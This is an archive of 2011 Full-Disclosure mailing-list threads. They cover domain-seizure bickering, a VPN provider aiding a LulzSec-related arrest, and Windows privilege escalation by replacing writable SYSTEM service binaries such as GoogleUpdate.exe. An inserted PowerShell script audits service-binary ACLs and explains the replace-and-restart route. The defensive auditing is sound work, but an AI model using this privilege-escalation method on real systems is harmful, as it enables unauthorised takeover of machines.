  On Oct 2, 2011 5:44 PM, andrew.wallace andrew.wall...@rocketmail.com
  wrote:
  On Sun, Oct 2, 2011 at 11:25 PM, GloW - XD doo...@gmail.com wrote:
  Yes, it is nice ay :)
  When M$ asks me to remove it, I shall.
  cheers.
  xd
 
  It doesn't work that way, your domain will be seized by DHS-ICE.
 
  http://www.ice.gov/about/offices/homeland-security-investigations/


Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-02 Thread GloW - XD
Hey fatty-come-get-me,
Guy, you do not even read the links you post,
http://www.ice.gov/about/offices/homeland-security-investigations/

I have not broken their laws at all. I am no terrorist :s
lol... please, try harder, this time, try properly.
cheers fatty,
xd

On 3 October 2011 09:55, Jeffrey Walton noloa...@gmail.com wrote:

 On Sun, Oct 2, 2011 at 6:46 PM, Laurelai Storm laure...@oneechan.org
 wrote:
  I don't think they have the authority to seize non us domains owned by
  people not in the US.
 DNS is vulnerable to attackers and legislation alike.

  On Oct 2, 2011 5:44 PM, andrew.wallace andrew.wall...@rocketmail.com
  wrote:
  On Sun, Oct 2, 2011 at 11:25 PM, GloW - XD doo...@gmail.com wrote:
  Yes, it is nice ay :)
  When M$ asks me to remove it, I shall.
  cheers.
  xd
 
  It doesn't work that way, your domain will be seized by DHS-ICE.
 
  http://www.ice.gov/about/offices/homeland-security-investigations/


Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/ (fwd)

2011-10-02 Thread GloW - XD
rofl... I don't commit any online crime, I don't think I am headed anywhere
jailish soon :)
cheers.
xd


On 3 October 2011 10:22, valdis.kletni...@vt.edu wrote:

 Will the person who's headed to jail please have somebody let us know how
 they're doing?  And the rest of you, make note of what n3td3v classifies as
 threatening him and act accordingly.



 -- Forwarded message --
 From: andrew.wallace andrew.wall...@rocketmail.com
 To: valdis.kletni...@vt.edu valdis.kletni...@vt.edu
 Date: Sun, 02 Oct 2011 15:09:49 -0700 (PDT)
 Subject: Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/
 On Sun, Oct 2, 2011 at 10:51 PM,  valdis.kletni...@vt.edu wrote:
  On Sun, 02 Oct 2011 12:11:41 MDT, SanguineRose said:
  This is hot :) I rather enjoy a good epeen sizing contest
 
  And enough people will do a 'reply all' to n3td3v's postings that the
 fact he can't post
  to this list directly won't matter.

 Sadly crazy coder is on his way to jail for threatening me and of course
 the Microsoft piracy, bot net herding thing doesn't help.

 Andrew


Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-02 Thread GloW - XD
Hello,
hehe thank you but, it is merely something I wanted to do for seeing a little
more about the online state of mind about the whole being arrested, and to
what degree it would take.. etc... I think I do know where I stand, and, not
being a criminal, am not headed anywhere except my bed, tonight.
Anyhow, I hope people are observing things... anyone who is interested in
privacy... etc. and yes, ofc I would never keep pages like this up for
public; heck I even linked it to my main blog... I mean, I named it
Botmakers tute, lol... clearly people who would have seen this would
have known what I was doing exactly.
It is so far amusing this even took off as a topic though; I am kinda laughing
coz there is no PoC even connected here, no exploit, nothing but 'talk',
hearsay, and some files on a site :s, I doubt I would be targeted for
prison when I ain't committed a crime.
It is a good lesson indeed, I have said it all along, it is the
victim impact that is always what is gonna problemate things, and of course the
*real* press, politics and press.
It is what drives every cyber arrest so far.. maybe not torrent sites, I guess
they are targeted because of a lot of reasons, RIAA and, they still stay
online and I can still d/l any torrent file which works from TPB, which was
even taken through court :s... It just is that, why lock someone up for a couple
of files, when the network is crawling with deeper, nastier people and those
are definitely going to be targeted.. I would also never condone porn
online, I do have a partner so I'm biased against it a bit, but it is what
gets a lot of people in trouble also :s
Just, simply, do not shoot people, maybe don't start leaking 'government'
documentation and, even then, it is a murky area to be in because of
countries simply not complying with some things, or laws, or what they may
see as 'free' speech.
enjoy,
xd



On 3 October 2011 10:25, Richard Golodner rgolod...@infratection.com wrote:

 On Mon, 2011-10-03 at 10:02 +1100, GloW - XD wrote:
  the smarter people on the list, did not even visit that page
 I did try to look at your top level page and the connection timed out,
 clearly you know your shit.
 I enjoy your posts and your sense of humor, M$, no shit.
 You be cool, Richard



Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-02 Thread GloW - XD
 a legit key for the stuff.. and,
the ISO for the SDK is online, on an MS link, it is called free.
So, I don't know but, people have to really think where they want their
money spent, when they spend it: on police worrying about warez, or police
worrying about their children's safety online.
Ask yourself this, then reply.
Thank you.
(Apologies for any spelling errors, I need a good plugin to correct those
but it is simply pressures of work also, and trying to put a half-decent
post online...) again, I will try and make this a bit neater... but it is
time restraints.
cheers!
xd



On 3 October 2011 11:48, Richard Golodner rgolod...@infratection.com wrote:

 On Mon, 2011-10-03 at 11:00 +1100, GloW - XD wrote:
  It is sofar amusing this even took off as a topic tho,
 XD, anything that has n3td3v in it is going to draw attention as he
 pissed people off on many lists.
 The coolest thing is your social-state of mind experiment. I am not
 sure, nor want to know where you are located, but I am amazed at the
 decline of intellect here in America. You can probably verify this by
 your own logs, you just don't get to see the guy in the Harley tank-top
 tee shirt with a beer in one hand and his mouse in the other trying to
 play XSS with your web pages. Trust me, some of them look like that.
 From your posts I can tell you are a bright gentleman and an asset to
 the community of FD. It is my pleasure to be able to write you and I
 wish you success in your career. I am an old man (48) and can see the
 difference between the cream and the crap.
 With a varied career in the intelligence industry I can assure you that
 you have nothing to worry about police/legal wise. There is much heavier
 shit going on in the world besides what that douche bag accused you of and
 what M$ would do. You are safe and those other guys/gals (Lorelei?) can
 fuck off!
 Keep on doing what you do as it is definitely appreciated by me. I am
 sure Valdis digs it too, but I have not spoken to the man in a while.
 Be cool, Richard



Re: [Full-disclosure] Is this for real.. http://n3td3v.org.uk/

2011-10-02 Thread GloW - XD
I hardly use google on my own site... i did once tho, and, i did not see
that, but, now it seems to be a problem i think, or, i am taking your word
that it is now cached, well, that took them a whole of, 2 days.
Nice work. They know where traffic is going, and are making sure they make
money off things like that... i guess.
Another interesting area...because they actually make backups of files too...

sheesh, have they already cached it :s hrm... lol...well, that was VERY fast
then, considering i linked to it only a couple days ago :s from the files, and
page itself, i meant, that was there for my own backups for how i like my VS
setup, it just seems to be a great tute for compiling any .cpp or .c file on
windows env... i guess i should maybe take it down now eh.. i have proved
what i wanted.. did not think google would cache that... don't look on google
at all, and, not for my own site :s
but, i will be sure to try and fix it anyhow, or just delink that page :s
it is no bother now, i did what was intended... the page is no longer
needed.
Anyhow, cheers for pointing that out.
xd


On 3 October 2011 12:02, valdis.kletni...@vt.edu wrote:

 On Mon, 03 Oct 2011 11:00:55 +1100, you said:

  privacy... etc. and yes, ofc i would never keep pages like this up for
  public, heck i even linked it to my main blog.

 Wouldn't keep it up for the public?  Have you looked to see if Google has
 cached your site yet? ;)


Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-30 Thread GloW - XD
 in Russia, they are required by federal law to hand over your
  details wherever you may reside. I don't know where you've obtained this
  idea that they can't.
 
 
  Just because something is advertised as 'anonymous' doesn't mean it's 'so
  anonymous you can break the law' and anyone using an EU/US-related country
  to do this is either stupid or naive.
 
 
  On Thu, Sep 29, 2011 at 1:50 PM, xD 0x41 sec...@gmail.com wrote:
 
 
  They advertised as anonymous VPN to 'everyone'.
  Then, that would mean, especially NOT locally, that's something which is
  also, subject to federal laws though so, in its own country, the provider
  may have to, no matter what's advertised, BUT outside-of-country customers
  should not be handed over.
  ISPs here don't do it, and haven't, for like 20 yrs, they also do not
  take down people, issue nor execute other people's 'takedown orders', there
  are many reasons for this but basically, they lose money from it.
  Anyhow, in UK, you may be right, but outside of there, then, they should
  have maybe not advertised as anonymous VPN services for everyone and
  anyone. that's obvious crap we know now.
  anyhow, cheers,
  xd
 
 
 
 
 
  On 29 September 2011 22:45, Benji m...@b3nji.com wrote:
 
 
  I'm sorry, why is it 'worrying' that a vpn provider that was a UK business
  and was located in the UK, is subject to UK law?
 
 
 
 
 
  On Thu, Sep 29, 2011 at 9:51 AM, Darren Martyn
  d.martyn.fulldisclos...@gmail.com wrote:
 
 
  Again, I hope this does not fail to send.
  The reasoning behind the Pure Elite recruitment channel was A: to
  recruit some talented people (and, by all accounts, there were some
  talented programmers there) and B: development and idle talk. Now more
  interesting was the reasoning behind the name - by putting the developers
  and coders and potential recruits in a channel named Pure Elite, it was
  essentially an ego boost for the new guys, made them feel valued, etc,
  when in fact most were but pawns to be used (IMHO).
 
  This co-operation between VPN providers and LEO, while being nothing new
  - remember how hushmail caved in - is indeed worrying for those of us who
  are privacy advocates as well as security researchers.
 
  On a more direct note, Laurelai, do not presume that you know all there
  is to know about them. Doing so would be foolish. (Now don't go assuming
  that I hate you, I bear you bugger all ill-will, etc).
  Good day.
 
 
 
 
  On Wed, Sep 28, 2011 at 5:44 AM, Laurelai Storm laure...@oneechan.org
  wrote:
 
 
 
  It's all good dude. What really concerns me is that vpn providers might
  give over logs to oppressive regimes. TOR is starting to look better and
  better.
 
 
  On Sep 27, 2011 11:40 PM, GloW - XD doo...@gmail.com wrote:
   never did... was only for one buttcheek kid that i was a little pissed and
   thinking things which, prolly were wrong at the time...
   I am adult enough to apologise for what happened back then, and hopefully it
   is just, cool.
   :)
   cheers, you're loved by many, you just have many trollers too :p
   take care ,
   xd
  
 
  On 28 September 2011 14:32, Laurelai Storm laure...@oneechan.org
 wrote:
  
   I'm surprised, someone on the internet who *doesn't * hate me :p
   On Sep 27, 2011 11:29 PM, GloW - XD doo...@gmail.com wrote:
 Hello Laurelai ,
 Oh i agree it is still a terrible precedent to be set.. I don't even know
 where, legally, i stand anymore...
 It is rather disturbing, no matter WHO it was laurela.
 I am all for the hatred against the VPN provs, and this is not just
 happening here, and i made a BIG statement about this, and privacy, in my
 channel on efnet, first as i saw it.
    
 Then saw a torrentfreak feed, of someone who was an owner of a huge torrent
 site, was handed to authorities, not by the hoster, no... but by the
 frigging payment handler, ie paypal or alertpay most likely.
    
 This is not good, it makes a grey cloud now over what is 'anon' and what
 isn't. and that's a bad thing for us all.
 Too much fraud is causing this, that's plain and simple. Abusing places like
 Sony, and, major banks, only make the authorities turn to politics, whom in
 turn can bully with federal and state laws of ANY country, i think this is
 the dangerous part which is affecting lulzsec members or whoever was a part of
 it, and, i mean efnet is no recruiting grounds for decent hkrs.
 Simple as that, you know it, maybe through word of mouth ok, but not alone by
 being in channels but that network, is one federal hideout now..and, that is
 every channel, if it is not being spied (yea they have a module
 m_spychannel.c or similar, which, they actually had without realising, asked
 a friend, to code for them.
 This was rejected by me/her, but i believe they have the module running now.
 So, what was to stop them adding their own hidden spy mode to it :s look at
 what they did to my old channel

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-27 Thread GloW - XD
#pure-elite , rofl... yes indeed :P
hehe... nice story tho...funny about the elite channel thing... why do ppl
tag themselves as elite? usually when they are not...
ohwell, that's efnut :s (irc sucks)
xd


On 27 September 2011 19:03, Darren Martyn d.martyn.fulldisclos...@gmail.com
 wrote:

 Hope this sends correctly, new email client and all... But seeing as it is
 an international investigation many people have been bending over backwards
 to assist LEO on this. HMA and perfect privacy were the VPNs of choice for
 them it would appear, oh, and he was part of the #pure-elite channel on that
 IRC server, and hence, considered by LEO and others as Part of LulzSec.

 TL;DR, this is nothing new.

 On Tue, Sep 27, 2011 at 6:53 AM, Laurelai Storm laure...@oneechan.org wrote:

 And the guy wasn't even a part of lulzsec
 On Sep 26, 2011 10:37 PM, Jeffrey Walton noloa...@gmail.com wrote:
  On Mon, Sep 26, 2011 at 8:47 PM, Ivan . ivan...@gmail.com wrote:
 
 http://www.h-online.com/security/news/item/VPN-provider-helped-track-down-alleged-LulzSec-member-1349666.html
  Though HMA claims they complied with a court order, it looks as if
  they facilitated a law enforcement request. The US and the FBI have no
  jurisdiction in the UK.
 
  Jeff
 






Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-27 Thread GloW - XD
Hello Laurelai ,
Oh i agree it is still a terrible precedent to be set.. I don't even know
where, legally, i stand anymore...
It is rather disturbing, no matter WHO it was laurela.
I am all for the hatred against the VPN provs, and this is not just
happening here, and i made a BIG statement about this, and privacy, in my
channel on efnet, first as i saw it.

Then saw a torrentfreak feed, of someone who was an owner of a huge torrent
site, was handed to authorities, not by the hoster, no... but by the
frigging payment handler, ie paypal or alertpay most likely.

This is not good, it makes a grey cloud now over what is 'anon' and what
isn't. and that's a bad thing for us all.
Too much fraud is causing this, that's plain and simple. Abusing places like
Sony, and, major banks, only make the authorities turn to politics, whom in
turn can bully with federal and state laws of ANY country, i think this is
the dangerous part which is affecting lulzsec members or whoever was a part of
it, and, i mean efnet is no recruiting grounds for decent hkrs.
Simple as that, you know it, maybe through word of mouth ok, but not alone by
being in channels but that network, is one federal hideout now..and, that is
every channel, if it is not being spied (yea they have a module
m_spychannel.c or similar, which, they actually had without realising, asked
a friend, to code for them.
This was rejected by me/her, but i believe they have the module running now.
So, what was to stop them adding their own hidden spy mode to it :s look at
what they did to my old channel #haqnet, they introduced drinemon and a
bunch of other things, when it could have been simply worked out with
words.. but anyhow, i will not brood on the past, i hope this is mutual
Laurelai, I have nothing bad to say about you, and in turn, expect the same.
Respect for respect dear.
I do agree with you about the situation and, as you can see, am not holding
(undisclosed) crappy things which happened a long time ago, over one idiotic
kid, on efnet, whom now i know you do not associate with. So, i want that,
to be laid to rest now.. please.
And, we can only hope that the greater common sense will prevail and
hopefully, places will be forced to prove anonymity in some way, whether
that be by showing people email interaction with requesters of people's
info, or anything simple even, which would be then a standard for VPN, I do
not use them but, if i bought anonymous vpn, I'd expect exactly that, without
political interaction and grey areas about who and what is now legal and not
legal on the internet, on chatrooms, and on even websites.
ok, that's plenty, cheers!
xd


On 28 September 2011 13:41, Laurelai laure...@oneechan.org wrote:

  On 9/27/2011 10:10 PM, sandeep k wrote:

 Lolz members was really insane, i'm not sure why to use that crappy hma.
 On Sep 27, 2011 8:36 PM, Ferenc Kovacs tyr...@gmail.com wrote:
  yeah, and usually the same goes for calling others kids ;)
 
  On Tue, Sep 27, 2011 at 10:30 PM, GloW - XD doo...@gmail.com wrote:
  #pure-elite , rofl... yes indeed :P
  hehe... nice story tho...funny about the elite channel thing... why do ppl
  tag themselves as elite? usually when they are not...
  ohwell, that's efnut :s (irc sucks)
  xd
 
 
  On 27 September 2011 19:03, Darren Martyn
  d.martyn.fulldisclos...@gmail.com wrote:
 
   Hope this sends correctly, new email client and all... But seeing as it is
   an international investigation many people have been bending over backwards
   to assist LEO on this. HMA and perfect privacy were the VPNs of choice for
   them it would appear, oh, and he was part of the #pure-elite channel on that
   IRC server, and hence, considered by LEO and others as Part of LulzSec.
 
  TL;DR, this is nothing new.
 
   On Tue, Sep 27, 2011 at 6:53 AM, Laurelai Storm laure...@oneechan.org wrote:
 
   And the guy wasn't even a part of lulzsec
 
   On Sep 26, 2011 10:37 PM, Jeffrey Walton noloa...@gmail.com wrote:
    On Mon, Sep 26, 2011 at 8:47 PM, Ivan . ivan...@gmail.com wrote:
   
    http://www.h-online.com/security/news/item/VPN-provider-helped-track-down-alleged-LulzSec-member-1349666.html
    Though HMA claims they complied with a court order, it looks as if
    they facilitated a law enforcement request. The US and the FBI have no
    jurisdiction in the UK.
  
   Jeff
  
 
 
 

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-27 Thread GloW - XD
never did... was only for one buttcheek kid that i was a little pissed and
thinking things which, prolly were wrong at the time...
I am adult enough to apologise for what happened back then, and hopefully it
is just, cool.
:)
cheers, you're loved by many, you just have many trollers too :p
take care ,
xd


On 28 September 2011 14:32, Laurelai Storm laure...@oneechan.org wrote:

 I'm surprised, someone on the internet who *doesn't * hate me :p
 On Sep 27, 2011 11:29 PM, GloW - XD doo...@gmail.com wrote:
  Hello Laurelai ,
  Oh i agree it is still a terrible precedent to be set.. I don't even know
  where, legally, i stand anymore...
  It is rather disturbing, no matter WHO it was laurela.
  I am all for the hatred against the VPN provs, and this is not just
  happening here, and i made a BIG statement about this, and privacy, in my
  channel on efnet, first as i saw it.
 
  Then saw a torrentfreak feed, of someone who was an owner of a huge torrent
  site, was handed to authorities, not by the hoster, no... but by the
  frigging payment handler, ie paypal or alertpay most likely.
 
  This is not good, it makes a grey cloud now over what is 'anon' and what
  isn't. and that's a bad thing for us all.
  Too much fraud is causing this, that's plain and simple. Abusing places like
  Sony, and, major banks, only make the authorities turn to politics, whom in
  turn can bully with federal and state laws of ANY country, i think this is
  the dangerous part which is affecting lulzsec members or whoever was a part of
  it, and, i mean efnet is no recruiting grounds for decent hkrs.
  Simple as that, you know it, maybe through word of mouth ok, but not alone by
  being in channels but that network, is one federal hideout now..and, that is
  every channel, if it is not being spied (yea they have a module
  m_spychannel.c or similar, which, they actually had without realising, asked
  a friend, to code for them.
  This was rejected by me/her, but i believe they have the module running now.
  So, what was to stop them adding their own hidden spy mode to it :s look at
  what they did to my old channel #haqnet, they introduced drinemon and a
  bunch of other things, when it could have been simply worked out with
  words.. but anyhow, i will not brood on the past, i hope this is mutual
  Laurelai, I have nothing bad to say about you, and in turn, expect the same.
  Respect for respect dear.
  I do agree with you about the situation and, as you can see, am not holding
  (undisclosed) crappy things which happened a long time ago, over one idiotic
  kid, on efnet, whom now i know you do not associate with. So, i want that,
  to be laid to rest now.. please.
  And, we can only hope that the greater common sense will prevail and
  hopefully, places will be forced to prove anonymity in some way, whether
  that be by showing people email interaction with requesters of people's
  info, or anything simple even, which would be then a standard for VPN, I do
  not use them but, if i bought anonymous vpn, I'd expect exactly that, without
  political interaction and grey areas about who and what is now legal and not
  legal on the internet, on chatrooms, and on even websites.
  ok, that's plenty, cheers!
  xd
 
 
  On 28 September 2011 13:41, Laurelai laure...@oneechan.org wrote:
 
  On 9/27/2011 10:10 PM, sandeep k wrote:
 
   Lolz members was really insane, i'm not sure why to use that crappy hma.
  On Sep 27, 2011 8:36 PM, Ferenc Kovacs tyr...@gmail.com wrote:
   yeah, and usually the same goes for calling others kids ;)
  
   On Tue, Sep 27, 2011 at 10:30 PM, GloW - XD doo...@gmail.com wrote:
    #pure-elite , rofl... yes indeed :P
    hehe... nice story tho...funny about the elite channel thing... why do ppl
    tag themselves as elite? usually when they are not...
    ohwell, that's efnut :s (irc sucks)
    xd
  
  
   On 27 September 2011 19:03, Darren Martyn
   d.martyn.fulldisclos...@gmail.com wrote:
  
    Hope this sends correctly, new email client and all... But seeing as it is
    an international investigation many people have been bending over backwards
    to assist LEO on this. HMA and perfect privacy were the VPNs of choice for
    them it would appear, oh, and he was part of the #pure-elite channel on that
    IRC server, and hence, considered by LEO and others as Part of LulzSec.
   
    TL;DR, this is nothing new.
  
    On Tue, Sep 27, 2011 at 6:53 AM, Laurelai Storm laure...@oneechan.org wrote:
  
    And the guy wasn't even a part of lulzsec
  
    On Sep 26, 2011 10:37 PM, Jeffrey Walton noloa...@gmail.com wrote:
     On Mon, Sep 26, 2011 at 8:47 PM, Ivan . ivan...@gmail.com wrote:
    
     http://www.h-online.com/security/news/item/VPN-provider-helped-track-down-alleged-LulzSec-member-1349666.html
     Though HMA claims they complied with a court order, it looks as if
     they facilitated a law enforcement request. The US and the FBI have no
     jurisdiction in the UK.
   
Jeff

Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting

2011-09-25 Thread GloW - XD
Good luck with that... you might want to look into msgina.dll , try replace
that ;)
have phun
xd


On 26 September 2011 10:29, Travis Biehn tbi...@gmail.com wrote:

 It might be a fun experiment to see what DLLs they're looking for :.)


 -Travis

 On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote:

 To replace a service executable you usually need administrator access
 anyway.


 --Original Message--
 From: Madhur Ahuja
 Sender: full-disclosure-boun...@lists.grok.org.uk
 To: security-bas...@securityfocus.com
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] Privilege escalation on Windows using
 BinaryPlanting
 Sent: 25 Sep 2011 19:31

 Imagine a situation where I have a Windows system with the restricted
 user access and want to get the Administrator access.

 There are many services in Windows which run with SYSTEM account.

 If there exists even one such service whose executable is not
 protected by Windows File Protection, isn't it possible to execute
 malicious code (such as gaining Administrator access) simply by
 replacing the service executable with malicious one and then
 restarting the service.

 As a restricted user, what's stopping me to do this ?

 Is there any integrity check performed by services.msc or service
 itself before executing with SYSTEM account ?

 Madhur


 Sent from my POS BlackBerry wireless device, which may wipe itself at any moment




 --
 Twitter https://twitter.com/tbiehn | LinkedIn http://www.linkedin.com/in/travisbiehn |
 GitHub http://github.com/tbiehn | TravisBiehn.com http://www.travisbiehn.com



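Added example for the question above, not code posted by Madhur, Thor, or anyone else in this thread: the practical way to answer "what's stopping a restricted user" on a given box is to look at the file ACL of each service binary rather than at Windows File Protection. The script enumerates services, resolves each one's executable from its (possibly quoted, possibly argument-carrying) PathName, and reports any binary that a low-privilege principal is allowed to write, delete or re-permission. It assumes Windows PowerShell 5.1 or later with Get-CimInstance and Get-Acl available and read access to the binaries; the list of low-privilege principals and the write-rights mask are my choices for illustration, not anything the thread specifies.

```powershell
# Added example (not from the thread): flag Windows service binaries that a
# non-admin principal can replace. Assumes Windows PowerShell 5.1+ and that
# the caller can read the ACLs of the binaries in question.

# Principals a restricted user is normally a member of (assumption; extend to
# taste, e.g. with a site-specific group).
$lowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let the holder swap the file or its contents. Delete, TakeOwnership
# and ChangePermissions are included because each one is enough to get there.
$writeRights = [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::Delete -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership -bor
               [System.Security.AccessControl.FileSystemRights]::ChangePermissions

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Win32_Service.PathName is the raw command line, e.g.
    #   "C:\Program Files\Vendor\svc.exe" -run
    #   C:\Windows\system32\svchost.exe -k netsvcs
    if ($PathName -match '^\s*"([^"]+)"')   { return $Matches[1] }
    if ($PathName -match '^\s*(\S+\.exe)')  { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Test-WeakServiceBinaryAcl {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $null }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $null }
    $hits = foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $id = $ace.IdentityReference.Value
        if ($lowPrivPrincipals -notcontains $id) { continue }
        if (($ace.FileSystemRights -band $writeRights) -ne 0) {
            [pscustomobject]@{ Identity = $id; Rights = $ace.FileSystemRights }
        }
    }
    return $hits
}

# Walk every installed service, resolve its binary and report weak ACEs together
# with the account the service runs as, so SYSTEM services stand out.
Get-CimInstance -ClassName Win32_Service | ForEach-Object {
    $svc  = $_
    $exe  = Get-ServiceBinaryPath -PathName $svc.PathName
    $weak = Test-WeakServiceBinaryAcl -Path $exe
    foreach ($w in @($weak)) {
        if ($null -eq $w) { continue }
        [pscustomobject]@{
            Service   = $svc.Name
            RunsAs    = $svc.StartName
            Binary    = $exe
            Principal = $w.Identity
            Rights    = $w.Rights
        }
    }
} | Sort-Object Service | Format-Table -AutoSize
```

Run it as the restricted account you are assessing; a row whose RunsAs is LocalSystem is the case Madhur describes, since the listed principal can overwrite the binary and the next service restart (or reboot) executes whatever was put there. As kz2 and Thor point out, that only happens when an installer set those permissions, so a clean result on a stock OS is the expected one. Two neighbouring cases the check does not cover: a writable parent directory (rename the real binary away, drop your own), and an unquoted PathName containing spaces, which is a search-order problem rather than a file-ACL one.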

Re: [Full-disclosure] Privilege escalation on Windows using BinaryPlanting

2011-09-25 Thread GloW - XD
Haha , too good and too true thor !

Maybe he can trick the user into installing on a FAT32 partition first, and
THEN get them to execute from a remote share!

Rofl x10.

Agreed , this kind of attack, is NOT feasible in 2011, try maybe, 2006.

Anyhow it has been a pleasure, ending this BS i think once and for all,
lookup how winlogon works for one thing, then look at how windows creates
and maintains a service_table, and then at the dlls, which are protected ofc,
you cannot touch msgina.dll, without A LOT of help from a rootkit or something
similar, in which case, why would you need to ?
You could add an admin, hidden, and in simple bat file script (yes i do have
my own code but no it is not for kids..), this is 10 seconds and hidden, so
when you have gotten that far, why would you bother to hijack a dll ?

You CANNOT do crap, without complete ADMIN not SYSTEM, ADMIN$ share, and
total access to all sockets, meaning, all pipe control and that's where half of
windows exchanges smb shares for one thing, you guys don't seem to know CRAP
about windows to start with, then have the gall to raise such a frigging
ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this
being useful, or, even just working, and i would look but, you won't, cannot,
and will never be able to, especially on newer systems of windows7-8.
As i said earlier, enjoy your bs DLL hijacking, but ms, don't care for it,
and whatever patches they instilled, don't touch even service_table.. so,
they have not given it a high prio, and why should they.

This is simply a case of a secteam gaining notoriety, to try and make this a
'big bug!!' , to try and gain brownie points from MS. Even tho, i don't
believe in many things MS, I know windows system, and how to break it,
better than many people, and i can tell you now, this whole DLL hijack, is a
complete and utter waste of your times.
But... keep on going, maybe MS will send you another 'thankyou' email ;)
xd / crazycoders.com / #haxnet@Ef




On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.com wrote:

  Maybe he can trick the user into installing on a FAT32 partition first,
 and THEN get them to execute from a remote share!

 On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote:

   It might be a fun experiment to see what DLLs they're looking for :.)


 -Travis

 On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote:

 To replace a service executable you usually need administrator access
 anyway.


 --Original Message--
 From: Madhur Ahuja
 Sender: full-disclosure-boun...@lists.grok.org.uk
 To: security-bas...@securityfocus.com
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] Privilege escalation on Windows using
 BinaryPlanting
 Sent: 25 Sep 2011 19:31

 Imagine a situation where I have a Windows system with the restricted
 user access and want to get the Administrator access.

 There are many services in Windows which run with SYSTEM account.

 If there exists even one such service whose executable is not
 protected by Windows File Protection, isn't it possible to execute
 malicious code (such as gaining Administrator access) simply by
 replacing the service executable with malicious one and then
 restarting the service.

 As a restricted user, what's stopping me to do this ?

 Is there any integrity check performed by services.msc or service
 itself before executing with SYSTEM account ?

 Madhur


  Sent from my POS BlackBerry wireless device, which may wipe itself at any moment




  --
 Twitter https://twitter.com/tbiehn | LinkedIn http://www.linkedin.com/in/travisbiehn |
 GitHub http://github.com/tbiehn | TravisBiehn.com http://www.travisbiehn.com





Re: [Full-disclosure] Privilege escalation on Windows using Binary Planting

2011-09-25 Thread GloW - XD
Hrmm that sounds a bit too good to be true :P
i'd love to see what it involves... ie, the PoC.. and, i don't use
googleupdate, so, why would this affect non chrome users.. i dunno.. still
seems like not enough there to convince me yet, sorry.
xd



On 26 September 2011 11:18, Madhur Ahuja ahuja.mad...@gmail.com wrote:

 I haven't sent this email without doing a Proof of concept. It actually
 works with *Google Update Service*.

 The restricted user can replace GoogleUpdate.exe to execute malicious code.
 This service is installed by any Google component such as Picasa, Google
 Talk etc.

 http://www.google.com/support/installer/bin/answer.py?answer=98805

 Madhur

 On Monday, September 26, 2011, GloW - XD wrote:

 Haha , too good and too true thor !

 Maybe he can trick the user into installing on a FAT32 partition first,
 and THEN get them to execute from a remote share!

 Rofl x10.

 Agreed , this kind of attack, is NOT feasible in 2011, try maybe, 2006.

 Anyhow it has been a pleasure, ending this BS i think once and for all,
 lookup how winlogon works for one thing, then look at how windows creates
 and maintains a service_table, and then at the dlls, which are protected ofc,
 you cannot touch msgina.dll, without A LOT of help from a rootkit or something
 similar, in which case, why would you need to ?
 You could add an admin, hidden, and in simple bat file script (yes i do
 have my own code but no it is not for kids..), this is 10 seconds and hidden,
 so when you have gotten that far, why would you bother to hijack a dll ?

 You CANNOT do crap, without complete ADMIN not SYSTEM, ADMIN$ share, and
 total access to all sockets, meaning, all pipe control and that's where half of
 windows exchanges smb shares for one thing, you guys don't seem to know CRAP
 about windows to start with, then have the gall to raise such a frigging
 ridiculous topic about a non happening, YOUTUBE ONE 'real' event, of this
 being useful, or, even just working, and i would look but, you won't, cannot,
 and will never be able to, especially on newer systems of windows7-8.
 As i said earlier, enjoy your bs DLL hijacking, but ms, don't care for it,
 and whatever patches they instilled, don't touch even service_table.. so,
 they have not given it a high prio, and why should they.

 This is simply a case of a secteam gaining notoriety, to try and make this
 a 'big bug!!' , to try and gain brownie points from MS. Even tho, i don't
 believe in many things MS, I know windows system, and how to break it,
 better than many people, and i can tell you now, this whole DLL hijack, is a
 complete and utter waste of your times.
 But... keep on going, maybe MS will send you another 'thankyou' email ;)
 xd / crazycoders.com / #haxnet@Ef




 On 26 September 2011 10:52, Thor (Hammer of God) t...@hammerofgod.com wrote:

  Maybe he can trick the user into installing on a FAT32 partition first,
 and THEN get them to execute from a remote share!

 On Sep 25, 2011, at 5:30 PM, Travis Biehn tbi...@gmail.com wrote:

   It might be a fun experiment to see what DLLs they're looking for :.)


 -Travis

 On Sun, Sep 25, 2011 at 2:57 PM, kz2...@googlemail.com wrote:

 To replace a service executable you usually need administrator access
 anyway.


 --Original Message--
 From: Madhur Ahuja
 Sender: full-disclosure-boun...@lists.grok.org.uk
 To: security-bas...@securityfocus.com
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] Privilege escalation on Windows using
 BinaryPlanting
 Sent: 25 Sep 2011 19:31

 Imagine a situation where I have a Windows system with the restricted
 user access and want to get the Administrator access.

 There are many services in Windows which run with SYSTEM account.

 If there exists even one such service whose executable is not
 protected by Windows File Protection, isn't it possible to execute
 malicious code (such as gaining Administrator access) simply by
